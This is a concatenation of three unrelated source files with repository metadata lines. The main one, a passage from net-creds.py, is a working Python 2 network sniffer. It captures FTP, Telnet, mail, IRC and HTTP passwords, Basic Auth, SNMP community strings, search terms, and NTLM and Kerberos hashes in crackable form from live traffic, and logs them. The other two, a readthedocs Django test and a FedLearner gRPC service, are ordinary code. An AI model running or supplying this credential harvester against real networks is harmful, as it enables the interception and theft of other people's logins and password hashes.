for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, parse_args().verbose)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use idential client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
if http_line != None:
method, path = parse_http_line(http_line, http_methods)
http_url_req = get_http_url(method, host, path, headers)
if http_url_req != None:
if verbose == False:
if len(http_url_req) > 98:
http_url_req = http_url_req[:99] + '...'
printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
# Print user/pwds
if body != '':
user_passwd = get_login_pass(body)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be prevent false+
if len(http_user) > 75 or len(http_pass) > 75:
return
user_msg = 'HTTP username: %s' % http_user
printer(src_ip_port, dst_ip_port, user_msg)
pass_msg = 'HTTP password: %s' % http_pass
printer(src_ip_port, dst_ip_port, pass_msg)
except UnicodeDecodeError:
pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
if method == 'POST' and 'ocsp.' not in host:
try:
if verbose == False and len(body) > 99:
# If it can't decode to utf8 we're probably not interested in it
msg = 'POST load: %s...' % body[:99].encode('utf8')
else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some add sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
basic_auth_creds = base64.decodestring(basic_auth_b64)
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
# Incomprehensible list comprehension flattens list of headers
# that are each split at ': '
# http://stackoverflow.com/a/406296
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
# Make the header key (like "Content-Length") lowercase
for header in headers_dict:
headers[header.lower()] = headers_dict[header]
return headers
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
msg2 = header_val2[1]
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(ack, msg2)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
msg_type = struct.unpack("<I",msg2[8:12])[0]
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[%s > %s] %s%s%s' % (src_ip_port, dst_ip_port, T, msg, W)
# All credentials will have dst_ip_port, URLs will not
# Prevent identical outputs unless it's an HTTP search or POST load
skip = ['Searched ', 'POST load:']
for s in skip:
if s not in msg:
if os.path.isfile('credentials.txt'):
with open('credentials.txt', 'r') as log:
contents = log.read()
if msg in contents:
return
print print_str
# Escape colors like whatweb has
ansi_escape = re.compile(r'\x1b[^m]*m')
print_str = ansi_escape.sub('', print_str)
# Log the creds
logging.info(print_str)
else:
print_str = '[%s] %s' % (src_ip_port.split(':')[0], msg)
print print_str
def main(args):
##################### DEBUG ##########################
## Hit Ctrl-C while program is running and you can see
## whatever variable you want within the IPython cli
## Don't forget to uncomment IPython in imports
#def signal_handler(signal, frame):
# embed()
## sniff(iface=conf.iface, prn=pkt_parser, store=0)
# sys.exit()
#signal.signal(signal.SIGINT, signal_handler)
######################################################
# Read packets from either pcap or interface
if args.pcap:
try:
pcap = rdpcap(args.pcap)
except Exception:
exit('[-] Could not open %s' % args.pcap)
for pkt in pcap:
pkt_parser(pkt)
else:
# Check for root
if geteuid():
exit('[-] Please run as root')
#Find the active interface
if args.interface:
conf.iface = args.interface
else:
conf.iface = iface_finder()
print '[*] Using interface:', conf.iface
if args.filterip:
sniff(iface=conf.iface, prn=pkt_parser, filter="not host %s" % args.filterip, store=0)
else:
sniff(iface=conf.iface, prn=pkt_parser, store=0)
if __name__ == "__main__":
main(parse_args())
| jorik041/net-creds | net-creds.py | Python | gpl-3.0 | 36,772 |
from StringIO import StringIO
from django.test import TestCase
from mock import patch
from core.management.commands import run_docker
from projects.models import Project
from builds.models import Version
class TestRunDocker(TestCase):
'''Test run_docker command with good input and output'''
fixtures = ['test_data']
def setUp(self):
self.project = Project.objects.get(slug='pip')
self.version = Version(slug='foo', verbose_name='foobar')
self.project.versions.add(self.version)
def _get_input(self, files=None):
return ('{"project": {"id": 6, "name": "Pip", "slug": "pip"},'
'"id": 71, "type": "tag", "identifier": "437fb316fbbdba1acdd22e07dbe7c4809ffd97e6",'
'"verbose_name": "stable", "slug": "stable"}')
def _docker_build(data):
if isinstance(data, Version):
return {'html': (0, 'DOCKER PASS', '')}
else:
return {'html': (1, '', 'DOCKER FAIL')}
def test_stdin(self):
'''Test docker build command'''
def _input(_, files=None):
return '{"test": "foobar"}'
with patch.object(run_docker.Command, '_get_input', _input):
cmd = run_docker.Command()
assert cmd._get_input() == '{"test": "foobar"}'
@patch.object(run_docker.Command, '_get_input', _get_input)
@patch('projects.tasks.docker_build', _docker_build)
@patch('sys.stdout', new_callable=StringIO)
def test_good_input(self, mock_output):
'''Test docker build command'''
cmd = run_docker.Command()
self.assertEqual(cmd._get_input(), self._get_input())
cmd.handle()
self.assertEqual(
mock_output.getvalue(),
'{"html": [0, "DOCKER PASS", ""]}\n'
)
@patch('projects.tasks.docker_build', _docker_build)
def test_bad_input(self):
'''Test docker build command'''
with patch.object(run_docker.Command, '_get_input') as mock_input:
with patch('sys.stdout', new_callable=StringIO) as mock_output:
mock_input.return_value = 'BAD JSON'
cmd = run_docker.Command()
cmd.handle()
self.assertEqual(
mock_output.getvalue(),
('{"doc_builder": '
'[-1, "", "ValueError: No JSON object could be decoded"]}'
'\n')
)
| takluyver/readthedocs.org | readthedocs/rtd_tests/tests/test_core_management.py | Python | mit | 2,433 |
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import logging
from concurrent import futures
import grpc
from google.protobuf import empty_pb2
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_portal_service_pb2 as dp_pb
from fedlearner.common import data_portal_service_pb2_grpc as dp_grpc
from fedlearner.common.db_client import DBClient
from fedlearner.data_join.data_portal_job_manager import DataPortalJobManager
from fedlearner.data_join.routine_worker import RoutineWorker
class DataPortalMaster(dp_grpc.DataPortalMasterServiceServicer):
def __init__(self, portal_name, kvstore, portal_options):
super(DataPortalMaster, self).__init__()
self._portal_name = portal_name
self._kvstore = kvstore
self._portal_options = portal_options
self._data_portal_job_manager = DataPortalJobManager(
self._kvstore, self._portal_name,
self._portal_options.long_running,
self._portal_options.check_success_tag,
self._portal_options.single_subfolder,
self._portal_options.files_per_job_limit,
start_date=self._portal_options.start_date,
end_date=self._portal_options.end_date
)
self._bg_worker = None
def GetDataPortalManifest(self, request, context):
return self._data_portal_job_manager.get_portal_manifest()
def RequestNewTask(self, request, context):
response = dp_pb.NewTaskResponse()
finished, task = \
self._data_portal_job_manager.alloc_task(request.rank_id)
if task is not None:
if isinstance(task, dp_pb.MapTask):
response.map_task.MergeFrom(task)
else:
assert isinstance(task, dp_pb.ReduceTask)
response.reduce_task.MergeFrom(task)
elif not finished:
response.pending.MergeFrom(empty_pb2.Empty())
else:
response.finished.MergeFrom(empty_pb2.Empty())
return response
def FinishTask(self, request, context):
self._data_portal_job_manager.finish_task(request.rank_id,
request.partition_id,
request.part_state)
return common_pb.Status()
def start(self):
self._bg_worker = RoutineWorker(
'portal_master_bg_worker',
self._data_portal_job_manager.backgroup_task,
lambda: True, 30
)
self._bg_worker.start_routine()
def stop(self):
if self._bg_worker is not None:
self._bg_worker.stop_routine()
self._bg_worker = None
class DataPortalMasterService(object):
def __init__(self, listen_port, portal_name,
kvstore_type, portal_options):
self._portal_name = portal_name
self._listen_port = listen_port
self._server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
kvstore = DBClient(kvstore_type, portal_options.use_mock_etcd)
self._data_portal_master = DataPortalMaster(portal_name, kvstore,
portal_options)
dp_grpc.add_DataPortalMasterServiceServicer_to_server(
self._data_portal_master, self._server
)
self._server.add_insecure_port('[::]:%d'%listen_port)
self._server_started = False
def start(self):
if not self._server_started:
self._server.start()
self._data_portal_master.start()
self._server_started = True
logging.warning("DataPortalMasterService name as %s start " \
"on port[%d]:",
self._portal_name, self._listen_port)
